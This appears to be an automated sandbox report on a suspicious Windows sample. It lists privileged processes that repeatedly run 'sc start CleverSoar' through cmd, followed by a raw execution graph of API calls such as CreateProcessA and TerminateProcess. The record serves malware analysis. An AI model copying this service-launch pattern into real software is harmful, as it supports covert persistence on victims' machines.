                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:100
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:101
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:102
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:103
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:104
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:105
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:106
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc start CleverSoar
                                  Imagebase:0x7ff76b340000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:107
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:108
                                  Start time:23:17:43
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd /c start sc start CleverSoar
                                  Imagebase:0x7ff65a080000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:267
                                  Start time:23:17:50
                                  Start date:22/12/2024
                                  Path:C:\Windows\System32\Conhost.exe
                                  Wow64 process (32bit):
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:
                                  Has administrator privileges:
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:2.4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:15.5%
                                    Total number of Nodes:793
                                    Total number of Limit Nodes:13
                                    execution_graph 65955 6c17cad3 65956 6c17cafd 65955->65956 65957 6c17cae5 __dosmaperr 65955->65957 65956->65957 65959 6c17cb77 65956->65959 65960 6c17cb48 __dosmaperr 65956->65960 65961 6c17cb90 65959->65961 65962 6c17cbab __dosmaperr 65959->65962 65965 6c17cbe7 __wsopen_s 65959->65965 66002 6c170120 18 API calls __fassign 65960->66002 65961->65962 65964 6c17cb95 65961->65964 65995 6c170120 18 API calls __fassign 65962->65995 65990 6c1819e5 65964->65990 65996 6c1747bb HeapFree GetLastError _free 65965->65996 65966 6c17cd3e 65969 6c17cdb4 65966->65969 65972 6c17cd57 GetConsoleMode 65966->65972 65971 6c17cdb8 ReadFile 65969->65971 65970 6c17cc07 65997 6c1747bb HeapFree GetLastError _free 65970->65997 65974 6c17cdd2 65971->65974 65975 6c17ce2c GetLastError 65971->65975 65972->65969 65976 6c17cd68 65972->65976 65974->65975 65978 6c17cda9 65974->65978 65988 6c17cbc2 __dosmaperr __wsopen_s 65975->65988 65976->65971 65979 6c17cd6e ReadConsoleW 65976->65979 65977 6c17cc0e 65977->65988 65998 6c17ac69 20 API calls __wsopen_s 65977->65998 65983 6c17cdf7 65978->65983 65984 6c17ce0e 65978->65984 65978->65988 65979->65978 65981 6c17cd8a GetLastError 65979->65981 65981->65988 66000 6c17cefe 23 API calls 3 library calls 65983->66000 65986 6c17ce25 65984->65986 65984->65988 66001 6c17d1b6 21 API calls __wsopen_s 65986->66001 65999 6c1747bb HeapFree GetLastError _free 65988->65999 65989 6c17ce2a 65989->65988 65991 6c1819f2 65990->65991 65993 6c1819ff 65990->65993 65991->65966 65992 6c181a0b 65992->65966 65993->65992 66003 6c170120 18 API calls __fassign 65993->66003 65995->65988 65996->65970 65997->65977 65998->65964 65999->65957 66000->65988 66001->65989 66002->65957 66003->65991 66004 6bff4a27 66008 6bff4a5d _strlen 66004->66008 66005 6c00639e 66136 6c170130 18 API calls 2 library calls 66005->66136 66006 6bff5b6f 66011 6c166a43 std::_Facet_Register 4 API calls 66006->66011 66007 6bff5b58 66122 6c166a43 66007->66122 66008->66005 66008->66006 66008->66007 66012 6bff5b09 _Yarn 66008->66012 66011->66012 66095 6c15aec0 66012->66095 66015 6bff5bad std::ios_base::_Ios_base_dtor 66015->66005 66018 6bff9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66015->66018 66101 6c164ff0 CreateProcessA 66015->66101 66016 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66016->66018 66017 6c15aec0 2 API calls 66017->66018 66018->66005 66018->66016 66018->66017 66019 6bffa292 Sleep 66018->66019 66028 6bffe619 66018->66028 66026 6bff9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66019->66026 66020 6bff660d 66022 6c166a43 std::_Facet_Register 4 API calls 66020->66022 66021 6bff6624 66023 6c166a43 std::_Facet_Register 4 API calls 66021->66023 66031 6bff65bc _Yarn _strlen 66022->66031 66023->66031 66024 6bff61cb _strlen 66024->66005 66024->66020 66024->66021 66024->66031 66025 6c0063b2 66137 6bfe15e0 18 API calls std::ios_base::_Ios_base_dtor 66025->66137 66026->66005 66026->66018 66026->66025 66027 6bff9bbd GetCurrentProcess TerminateProcess 66026->66027 66044 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66026->66044 66093 6c165960 104 API calls 66026->66093 66094 6c164ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66026->66094 66027->66018 66038 6bfff243 CreateFileA 66028->66038 66030 6c0064f8 66031->66025 66032 6bff6989 66031->66032 66033 6bff6970 66031->66033 66036 6bff6920 _Yarn 66031->66036 66035 6c166a43 std::_Facet_Register 4 API calls 66032->66035 66034 6c166a43 std::_Facet_Register 4 API calls 66033->66034 66034->66036 66035->66036 66105 6c165960 66036->66105 66054 6bfff2a7 66038->66054 66039 6bff69d6 std::ios_base::_Ios_base_dtor _strlen 66039->66005 66040 6bff6dbb 66039->66040 66041 6bff6dd2 66039->66041 66053 6bff6d69 _Yarn _strlen 66039->66053 66045 6c166a43 std::_Facet_Register 4 API calls 66040->66045 66042 6c166a43 std::_Facet_Register 4 API calls 66041->66042 66042->66053 66043 6c0002ca 66044->66026 66045->66053 66046 6bff7427 66048 6c166a43 std::_Facet_Register 4 API calls 66046->66048 66047 6bff7440 66049 6c166a43 std::_Facet_Register 4 API calls 66047->66049 66050 6bff73da _Yarn 66048->66050 66049->66050 66052 6c165960 104 API calls 66050->66052 66051 6c0002ac GetCurrentProcess TerminateProcess 66051->66043 66055 6bff748d std::ios_base::_Ios_base_dtor _strlen 66052->66055 66053->66025 66053->66046 66053->66047 66053->66050 66054->66043 66054->66051 66055->66005 66056 6bff79a8 66055->66056 66057 6bff7991 66055->66057 66060 6bff7940 _Yarn _strlen 66055->66060 66059 6c166a43 std::_Facet_Register 4 API calls 66056->66059 66058 6c166a43 std::_Facet_Register 4 API calls 66057->66058 66058->66060 66059->66060 66060->66025 66061 6bff7dc9 66060->66061 66062 6bff7de2 66060->66062 66065 6bff7d7c _Yarn 66060->66065 66063 6c166a43 std::_Facet_Register 4 API calls 66061->66063 66064 6c166a43 std::_Facet_Register 4 API calls 66062->66064 66063->66065 66064->66065 66066 6c165960 104 API calls 66065->66066 66067 6bff7e2f std::ios_base::_Ios_base_dtor _strlen 66066->66067 66067->66005 66068 6bff85bf 66067->66068 66069 6bff85a8 66067->66069 66076 6bff8556 _Yarn _strlen 66067->66076 66071 6c166a43 std::_Facet_Register 4 API calls 66068->66071 66070 6c166a43 std::_Facet_Register 4 API calls 66069->66070 66070->66076 66071->66076 66072 6bff896a 66074 6c166a43 std::_Facet_Register 4 API calls 66072->66074 66073 6bff8983 66075 6c166a43 std::_Facet_Register 4 API calls 66073->66075 66077 6bff891d _Yarn 66074->66077 66075->66077 66076->66025 66076->66072 66076->66073 66076->66077 66078 6c165960 104 API calls 66077->66078 66081 6bff89d0 std::ios_base::_Ios_base_dtor _strlen 66078->66081 66079 6bff8f1f 66082 6c166a43 std::_Facet_Register 4 API calls 66079->66082 66080 6bff8f36 66083 6c166a43 std::_Facet_Register 4 API calls 66080->66083 66081->66005 66081->66079 66081->66080 66086 6bff8ecd _Yarn _strlen 66081->66086 66082->66086 66083->66086 66084 6bff936d 66088 6c166a43 std::_Facet_Register 4 API calls 66084->66088 66085 6bff9354 66087 6c166a43 std::_Facet_Register 4 API calls 66085->66087 66086->66025 66086->66084 66086->66085 66089 6bff9307 _Yarn 66086->66089 66087->66089 66088->66089 66090 6c165960 104 API calls 66089->66090 66092 6bff93ba std::ios_base::_Ios_base_dtor 66090->66092 66091 6c164ff0 4 API calls 66091->66018 66092->66005 66092->66091 66093->66026 66094->66026 66096 6c15aed4 66095->66096 66097 6c15aed6 FindFirstFileA 66095->66097 66096->66097 66098 6c15af10 66097->66098 66099 6c15af14 FindClose 66098->66099 66100 6c15af72 66098->66100 66099->66098 66100->66015 66102 6c1650ca 66101->66102 66103 6c165080 WaitForSingleObject CloseHandle CloseHandle 66102->66103 66104 6c1650e3 66102->66104 66103->66102 66104->66024 66106 6c1659b7 66105->66106 66138 6c165ff0 66106->66138 66108 6c1659c8 66157 6c006ba0 66108->66157 66111 6c165a9f std::ios_base::_Ios_base_dtor 66114 6c02e010 67 API calls 66111->66114 66113 6c1659ec 66115 6c165a54 66113->66115 66121 6c165a67 66113->66121 66176 6c166340 66113->66176 66184 6c042000 66113->66184 66116 6c165ae2 std::ios_base::_Ios_base_dtor 66114->66116 66194 6c165b90 66115->66194 66116->66039 66119 6c165a5c 66215 6c007090 66119->66215 66209 6c02e010 66121->66209 66124 6c166a48 66122->66124 66123 6c166a62 66123->66012 66124->66123 66127 6c166a64 std::_Facet_Register 66124->66127 66668 6c16f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66124->66668 66126 6c1678c3 std::_Facet_Register 66672 6c169379 RaiseException 66126->66672 66127->66126 66669 6c169379 RaiseException 66127->66669 66129 6c1680bc IsProcessorFeaturePresent 66135 6c1680e1 66129->66135 66131 6c167883 66670 6c169379 RaiseException 66131->66670 66133 6c1678a3 std::invalid_argument::invalid_argument 66671 6c169379 RaiseException 66133->66671 66135->66012 66137->66030 66139 6c166025 66138->66139 66228 6c032020 66139->66228 66141 6c1660c6 66142 6c166a43 std::_Facet_Register 4 API calls 66141->66142 66143 6c1660fe 66142->66143 66245 6c167327 66143->66245 66145 6c166112 66257 6c031d90 66145->66257 66148 6c1661ec 66148->66108 66150 6c166226 66265 6c0326e0 24 API calls 4 library calls 66150->66265 66152 6c166238 66266 6c169379 RaiseException 66152->66266 66154 6c16624d 66155 6c02e010 67 API calls 66154->66155 66156 6c16625f 66155->66156 66156->66108 66158 6c006bd5 66157->66158 66159 6c032020 52 API calls 66158->66159 66160 6c006c68 66159->66160 66161 6c166a43 std::_Facet_Register 4 API calls 66160->66161 66162 6c006ca0 66161->66162 66163 6c167327 43 API calls 66162->66163 66164 6c006cb4 66163->66164 66165 6c031d90 89 API calls 66164->66165 66166 6c006d5d 66165->66166 66167 6c006d8e 66166->66167 66576 6c032250 30 API calls 66166->66576 66167->66113 66169 6c006dc8 66577 6c0326e0 24 API calls 4 library calls 66169->66577 66171 6c006dda 66578 6c169379 RaiseException 66171->66578 66173 6c006def 66174 6c02e010 67 API calls 66173->66174 66175 6c006e0f 66174->66175 66175->66113 66177 6c16638d 66176->66177 66579 6c1665a0 66177->66579 66179 6c16647c 66179->66113 66183 6c1663a5 66183->66179 66597 6c032250 30 API calls 66183->66597 66598 6c0326e0 24 API calls 4 library calls 66183->66598 66599 6c169379 RaiseException 66183->66599 66185 6c04203f 66184->66185 66189 6c042053 66185->66189 66608 6c033560 32 API calls std::_Xinvalid_argument 66185->66608 66187 6c04210e 66191 6c042121 66187->66191 66609 6c0337e0 32 API calls std::_Xinvalid_argument 66187->66609 66189->66187 66610 6c032250 30 API calls 66189->66610 66611 6c0326e0 24 API calls 4 library calls 66189->66611 66612 6c169379 RaiseException 66189->66612 66191->66113 66195 6c165b9e 66194->66195 66198 6c165bd1 66194->66198 66613 6c0301f0 66195->66613 66196 6c165c83 66196->66119 66198->66196 66617 6c032250 30 API calls 66198->66617 66200 6c170b18 67 API calls 66200->66198 66202 6c165cae 66618 6c032340 24 API calls 66202->66618 66204 6c165cbe 66619 6c169379 RaiseException 66204->66619 66206 6c165cc9 66207 6c02e010 67 API calls 66206->66207 66208 6c165d22 std::ios_base::_Ios_base_dtor 66207->66208 66208->66119 66210 6c02e04b 66209->66210 66211 6c02e0a3 66210->66211 66212 6c0301f0 64 API calls 66210->66212 66211->66111 66213 6c02e098 66212->66213 66214 6c170b18 67 API calls 66213->66214 66214->66211 66216 6c00709e 66215->66216 66219 6c0070d1 66215->66219 66218 6c0301f0 64 API calls 66216->66218 66217 6c007183 66217->66121 66220 6c0070c4 66218->66220 66219->66217 66665 6c032250 30 API calls 66219->66665 66222 6c170b18 67 API calls 66220->66222 66222->66219 66223 6c0071ae 66666 6c032340 24 API calls 66223->66666 66225 6c0071be 66667 6c169379 RaiseException 66225->66667 66227 6c0071c9 66229 6c166a43 std::_Facet_Register 4 API calls 66228->66229 66230 6c03207e 66229->66230 66231 6c167327 43 API calls 66230->66231 66232 6c032092 66231->66232 66267 6c032f60 42 API calls 4 library calls 66232->66267 66234 6c0320c8 66235 6c03210d 66234->66235 66237 6c032136 66234->66237 66236 6c032120 66235->66236 66268 6c166f8e 9 API calls 2 library calls 66235->66268 66236->66141 66269 6c032250 30 API calls 66237->66269 66240 6c03215b 66270 6c032340 24 API calls 66240->66270 66242 6c032171 66271 6c169379 RaiseException 66242->66271 66244 6c03217c 66244->66141 66246 6c167333 __EH_prolog3 66245->66246 66272 6c166eb5 66246->66272 66251 6c167351 66286 6c1673ba 39 API calls std::locale::_Setgloballocale 66251->66286 66252 6c1673ac 66252->66145 66254 6c167359 66287 6c1671b1 HeapFree GetLastError _Yarn ___std_exception_destroy 66254->66287 66256 6c16736f 66278 6c166ee6 66256->66278 66258 6c031dc7 66257->66258 66259 6c031ddc 66257->66259 66258->66148 66264 6c032250 30 API calls 66258->66264 66292 6c167447 66259->66292 66263 6c031e82 66264->66150 66265->66152 66266->66154 66267->66234 66268->66236 66269->66240 66270->66242 66271->66244 66273 6c166ec4 66272->66273 66274 6c166ecb 66272->66274 66288 6c1703cd 6 API calls std::_Lockit::_Lockit 66273->66288 66277 6c166ec9 66274->66277 66289 6c16858b EnterCriticalSection 66274->66289 66277->66256 66285 6c167230 6 API calls 2 library calls 66277->66285 66279 6c166ef0 66278->66279 66280 6c1703db 66278->66280 66281 6c166f03 66279->66281 66290 6c168599 LeaveCriticalSection 66279->66290 66291 6c1703b6 LeaveCriticalSection 66280->66291 66281->66252 66284 6c1703e2 66284->66252 66285->66251 66286->66254 66287->66256 66288->66277 66289->66277 66290->66281 66291->66284 66293 6c167450 66292->66293 66295 6c031dea 66293->66295 66301 6c16fd4a 66293->66301 66295->66258 66300 6c16c563 18 API calls __fassign 66295->66300 66296 6c16749c 66296->66295 66312 6c16fa58 65 API calls 66296->66312 66298 6c1674b7 66298->66295 66313 6c170b18 66298->66313 66300->66263 66302 6c16fd55 __wsopen_s 66301->66302 66303 6c16fd68 66302->66303 66304 6c16fd88 66302->66304 66338 6c170120 18 API calls __fassign 66303->66338 66308 6c16fd78 66304->66308 66324 6c17ae0c 66304->66324 66308->66296 66312->66298 66314 6c170b24 __wsopen_s 66313->66314 66315 6c170b43 66314->66315 66316 6c170b2e 66314->66316 66320 6c170b3e 66315->66320 66447 6c16c5a9 EnterCriticalSection 66315->66447 66462 6c170120 18 API calls __fassign 66316->66462 66318 6c170b60 66448 6c170b9c 66318->66448 66320->66295 66322 6c170b6b 66463 6c170b92 LeaveCriticalSection 66322->66463 66325 6c17ae18 __wsopen_s 66324->66325 66340 6c17039f EnterCriticalSection 66325->66340 66327 6c17ae26 66341 6c17aeb0 66327->66341 66332 6c17af72 66333 6c17b091 66332->66333 66365 6c17b114 66333->66365 66336 6c16fdcc 66339 6c16fdf5 LeaveCriticalSection 66336->66339 66338->66308 66339->66308 66340->66327 66342 6c17aed3 66341->66342 66343 6c17af2b 66342->66343 66350 6c17ae33 66342->66350 66358 6c16c5a9 EnterCriticalSection 66342->66358 66359 6c16c5bd LeaveCriticalSection 66342->66359 66360 6c1771e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66343->66360 66346 6c17af34 66361 6c1747bb HeapFree GetLastError _free 66346->66361 66348 6c17af3d 66348->66350 66362 6c176c1f 6 API calls std::_Lockit::_Lockit 66348->66362 66355 6c17ae6c 66350->66355 66351 6c17af5c 66363 6c16c5a9 EnterCriticalSection 66351->66363 66354 6c17af6f 66354->66350 66364 6c1703b6 LeaveCriticalSection 66355->66364 66357 6c16fda3 66357->66308 66357->66332 66358->66342 66359->66342 66360->66346 66361->66348 66362->66351 66363->66354 66364->66357 66366 6c17b133 66365->66366 66367 6c17b146 66366->66367 66371 6c17b15b 66366->66371 66381 6c170120 18 API calls __fassign 66367->66381 66369 6c17b0a7 66369->66336 66378 6c183fde 66369->66378 66376 6c17b27b 66371->66376 66382 6c183ea8 37 API calls __fassign 66371->66382 66373 6c17b2cb 66373->66376 66383 6c183ea8 37 API calls __fassign 66373->66383 66375 6c17b2e9 66375->66376 66384 6c183ea8 37 API calls __fassign 66375->66384 66376->66369 66385 6c170120 18 API calls __fassign 66376->66385 66386 6c184396 66378->66386 66381->66369 66382->66373 66383->66375 66384->66376 66385->66369 66388 6c1843a2 __wsopen_s 66386->66388 66387 6c1843a9 66404 6c170120 18 API calls __fassign 66387->66404 66388->66387 66389 6c1843d4 66388->66389 66395 6c183ffe 66389->66395 66394 6c183ff9 66394->66336 66406 6c1706cb 66395->66406 66400 6c184034 66402 6c184066 66400->66402 66446 6c1747bb HeapFree GetLastError _free 66400->66446 66405 6c18442b LeaveCriticalSection __wsopen_s 66402->66405 66404->66394 66405->66394 66407 6c16bceb __fassign 37 API calls 66406->66407 66408 6c1706dd 66407->66408 66409 6c1769d5 __wsopen_s 5 API calls 66408->66409 66410 6c1706ef 66408->66410 66409->66410 66411 6c16bdf6 66410->66411 66412 6c16be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 66411->66412 66413 6c16be0e 66412->66413 66413->66400 66414 6c18406c 66413->66414 66415 6c1844ec __wsopen_s 18 API calls 66414->66415 66416 6c184089 66415->66416 66417 6c18160c __wsopen_s 14 API calls 66416->66417 66419 6c18409e __dosmaperr 66416->66419 66418 6c1840bc 66417->66418 66418->66419 66420 6c184457 __wsopen_s CreateFileW 66418->66420 66419->66400 66426 6c184115 66420->66426 66421 6c184192 GetFileType 66422 6c18419d GetLastError 66421->66422 66423 6c1841e4 66421->66423 66425 6c16f9f2 __dosmaperr 66422->66425 66429 6c1817b0 __wsopen_s SetStdHandle 66423->66429 66424 6c184167 GetLastError 66424->66419 66427 6c1841ab CloseHandle 66425->66427 66426->66421 66426->66424 66428 6c184457 __wsopen_s CreateFileW 66426->66428 66427->66419 66443 6c1841d4 66427->66443 66430 6c18415a 66428->66430 66431 6c184205 66429->66431 66430->66421 66430->66424 66432 6c184251 66431->66432 66433 6c184666 __wsopen_s 70 API calls 66431->66433 66434 6c184710 __wsopen_s 70 API calls 66432->66434 66436 6c184258 66432->66436 66433->66432 66435 6c184286 66434->66435 66435->66436 66438 6c184294 66435->66438 66437 6c17b925 __wsopen_s 21 API calls 66436->66437 66437->66419 66438->66419 66439 6c184310 CloseHandle 66438->66439 66440 6c184457 __wsopen_s CreateFileW 66439->66440 66441 6c18433b 66440->66441 66442 6c184345 GetLastError 66441->66442 66441->66443 66444 6c184351 __dosmaperr 66442->66444 66443->66419 66445 6c18171f __wsopen_s SetStdHandle 66444->66445 66445->66443 66446->66402 66447->66318 66449 6c170bbe 66448->66449 66450 6c170ba9 66448->66450 66453 6c170bb9 66449->66453 66464 6c170cb9 66449->66464 66486 6c170120 18 API calls __fassign 66450->66486 66453->66322 66458 6c170be1 66479 6c17b898 66458->66479 66460 6c170be7 66460->66453 66487 6c1747bb HeapFree GetLastError _free 66460->66487 66462->66320 66463->66320 66465 6c170cd1 66464->66465 66466 6c170bd3 66464->66466 66465->66466 66467 6c179c60 18 API calls 66465->66467 66470 6c17873e 66466->66470 66468 6c170cef 66467->66468 66488 6c17bb6c 66468->66488 66471 6c178755 66470->66471 66472 6c170bdb 66470->66472 66471->66472 66544 6c1747bb HeapFree GetLastError _free 66471->66544 66474 6c179c60 66472->66474 66475 6c179c81 66474->66475 66476 6c179c6c 66474->66476 66475->66458 66545 6c170120 18 API calls __fassign 66476->66545 66478 6c179c7c 66478->66458 66480 6c17b8be 66479->66480 66484 6c17b8a9 __dosmaperr 66479->66484 66481 6c17b8e5 66480->66481 66482 6c17b907 __dosmaperr 66480->66482 66546 6c17b9c1 66481->66546 66554 6c170120 18 API calls __fassign 66482->66554 66484->66460 66486->66453 66487->66453 66489 6c17bb78 __wsopen_s 66488->66489 66490 6c17bbca 66489->66490 66491 6c17bc33 __dosmaperr 66489->66491 66495 6c17bb80 __dosmaperr 66489->66495 66499 6c181990 EnterCriticalSection 66490->66499 66529 6c170120 18 API calls __fassign 66491->66529 66493 6c17bbd0 66497 6c17bbec __dosmaperr 66493->66497 66500 6c17bc5e 66493->66500 66495->66466 66528 6c17bc2b LeaveCriticalSection __wsopen_s 66497->66528 66499->66493 66501 6c17bc80 66500->66501 66527 6c17bc9c __dosmaperr 66500->66527 66502 6c17bcd4 66501->66502 66504 6c17bc84 __dosmaperr 66501->66504 66503 6c17bce7 66502->66503 66538 6c17ac69 20 API calls __wsopen_s 66502->66538 66530 6c17be40 66503->66530 66537 6c170120 18 API calls __fassign 66504->66537 66509 6c17bcfd 66513 6c17bd26 66509->66513 66514 6c17bd01 66509->66514 66510 6c17bd3c 66511 6c17bd95 WriteFile 66510->66511 66512 6c17bd50 66510->66512 66515 6c17bdb9 GetLastError 66511->66515 66511->66527 66517 6c17bd85 66512->66517 66518 6c17bd5b 66512->66518 66540 6c17beb1 43 API calls 5 library calls 66513->66540 66514->66527 66539 6c17c25b 6 API calls __wsopen_s 66514->66539 66515->66527 66543 6c17c2c3 7 API calls 2 library calls 66517->66543 66519 6c17bd75 66518->66519 66520 6c17bd60 66518->66520 66542 6c17c487 8 API calls 3 library calls 66519->66542 66523 6c17bd65 66520->66523 66520->66527 66541 6c17c39e 7 API calls 2 library calls 66523->66541 66525 6c17bd73 66525->66527 66527->66497 66528->66495 66529->66495 66531 6c1819e5 __wsopen_s 18 API calls 66530->66531 66532 6c17be51 66531->66532 66533 6c17bcf8 66532->66533 66534 6c1749b2 __Getctype 37 API calls 66532->66534 66533->66509 66533->66510 66535 6c17be74 66534->66535 66535->66533 66536 6c17be8e GetConsoleMode 66535->66536 66536->66533 66537->66527 66538->66503 66539->66527 66540->66527 66541->66525 66542->66525 66543->66525 66544->66472 66545->66478 66547 6c17b9cd __wsopen_s 66546->66547 66555 6c181990 EnterCriticalSection 66547->66555 66549 6c17b9db 66551 6c17ba08 66549->66551 66556 6c17b925 66549->66556 66569 6c17ba41 LeaveCriticalSection __wsopen_s 66551->66569 66553 6c17ba2a 66553->66484 66554->66484 66555->66549 66570 6c1815a2 66556->66570 66558 6c17b93b 66575 6c18171f SetStdHandle __dosmaperr __wsopen_s 66558->66575 66560 6c17b935 66560->66558 66561 6c17b96d 66560->66561 66562 6c1815a2 __wsopen_s 18 API calls 66560->66562 66561->66558 66563 6c1815a2 __wsopen_s 18 API calls 66561->66563 66564 6c17b964 66562->66564 66565 6c17b979 CloseHandle 66563->66565 66566 6c1815a2 __wsopen_s 18 API calls 66564->66566 66565->66558 66567 6c17b985 GetLastError 66565->66567 66566->66561 66567->66558 66568 6c17b993 __dosmaperr 66568->66551 66569->66553 66571 6c1815af __dosmaperr 66570->66571 66573 6c1815c4 __dosmaperr 66570->66573 66571->66560 66572 6c1815e9 66572->66560 66573->66572 66574 6c170120 __fassign 18 API calls 66573->66574 66574->66571 66575->66568 66576->66169 66577->66171 66578->66173 66580 6c1665dc 66579->66580 66581 6c166608 66579->66581 66595 6c166601 66580->66595 66602 6c032250 30 API calls 66580->66602 66586 6c166619 66581->66586 66600 6c033560 32 API calls std::_Xinvalid_argument 66581->66600 66584 6c1667e8 66603 6c032340 24 API calls 66584->66603 66586->66595 66601 6c032f60 42 API calls 4 library calls 66586->66601 66587 6c1667f7 66604 6c169379 RaiseException 66587->66604 66591 6c166827 66606 6c032340 24 API calls 66591->66606 66593 6c16683d 66607 6c169379 RaiseException 66593->66607 66595->66183 66596 6c166653 66596->66595 66605 6c032250 30 API calls 66596->66605 66597->66183 66598->66183 66599->66183 66600->66586 66601->66596 66602->66584 66603->66587 66604->66596 66605->66591 66606->66593 66607->66595 66608->66189 66609->66191 66610->66189 66611->66189 66612->66189 66614 6c03022e 66613->66614 66615 6c0304d6 66614->66615 66620 6c1717db 66614->66620 66615->66200 66617->66202 66618->66204 66619->66206 66621 6c171806 66620->66621 66622 6c1717e9 66620->66622 66621->66614 66622->66621 66623 6c17180a 66622->66623 66624 6c1717f6 66622->66624 66628 6c171a02 66623->66628 66636 6c170120 18 API calls __fassign 66624->66636 66629 6c171a0e __wsopen_s 66628->66629 66637 6c16c5a9 EnterCriticalSection 66629->66637 66631 6c171a1c 66638 6c1719bf 66631->66638 66635 6c17183c 66635->66614 66636->66621 66637->66631 66646 6c1785a6 66638->66646 66644 6c1719f9 66645 6c171a51 LeaveCriticalSection 66644->66645 66645->66635 66647 6c179c60 18 API calls 66646->66647 66648 6c1785b7 66647->66648 66649 6c1819e5 __wsopen_s 18 API calls 66648->66649 66651 6c1785bd __wsopen_s 66649->66651 66650 6c1719d3 66653 6c17183e 66650->66653 66651->66650 66663 6c1747bb HeapFree GetLastError _free 66651->66663 66655 6c171850 66653->66655 66657 6c17186e 66653->66657 66654 6c17185e 66664 6c170120 18 API calls __fassign 66654->66664 66655->66654 66655->66657 66660 6c171886 _Yarn 66655->66660 66662 6c178659 62 API calls 66657->66662 66658 6c170cb9 62 API calls 66658->66660 66659 6c179c60 18 API calls 66659->66660 66660->66657 66660->66658 66660->66659 66661 6c17bb6c __wsopen_s 62 API calls 66660->66661 66661->66660 66662->66644 66663->66650 66664->66657 66665->66223 66666->66225 66667->66227 66668->66124 66669->66131 66670->66133 66671->66126 66672->66129 66673 6c16ef3f 66674 6c16ef4b __wsopen_s 66673->66674 66675 6c16ef52 GetLastError ExitThread 66674->66675 66676 6c16ef5f 66674->66676 66685 6c1749b2 GetLastError 66676->66685 66681 6c16ef7b 66719 6c16eeaa 16 API calls 2 library calls 66681->66719 66684 6c16ef9d 66686 6c1749cf 66685->66686 